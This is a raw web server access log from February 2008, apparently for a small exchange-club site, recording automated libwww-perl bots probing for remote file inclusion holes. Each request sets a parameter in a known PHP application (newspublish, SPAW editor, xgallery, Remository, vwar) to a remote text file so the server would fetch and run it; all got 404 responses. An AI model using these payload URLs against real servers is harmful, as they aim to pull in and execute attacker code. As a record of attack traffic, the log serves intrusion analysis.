64.185.237.140 - - [17/Feb/2008:19:46:38 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.140 - - [17/Feb/2008:19:46:39 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.140 - - [17/Feb/2008:19:46:40 -0800] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
64.185.237.140 - - [17/Feb/2008:19:46:42 -0800] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
82.100.220.42 - - [17/Feb/2008:19:46:55 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:19:47:57 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:19:47:57 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:19:47:58 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
205.234.195.11 - - [17/Feb/2008:19:48:34 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/rha.mutzz/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
87.239.10.63 - - [17/Feb/2008:19:48:55 -0800] "GET /logs/access_071231.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.myadultsshop.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:19:49:02 -0800] "GET /logs/access_071217.log/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:19:49:02 -0800] "GET /convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:19:49:02 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
67.15.190.12 - - [17/Feb/2008:19:49:30 -0800] "GET /logs/access_071203.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:19:49:37 -0800] "GET /logs/access_071217.log/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:19:49:38 -0800] "GET /convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:19:49:38 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.toulouseangloexchange.com"
82.100.220.42 - - [17/Feb/2008:19:49:46 -0800] "GET /logs/access_071119.log//newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.100.220.42 - - [17/Feb/2008:19:49:46 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.100.220.42 - - [17/Feb/2008:19:49:47 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.toulouseangloexchange.com"
82.134.6.30 - - [17/Feb/2008:19:49:59 -0800] "GET /logs/access_071203.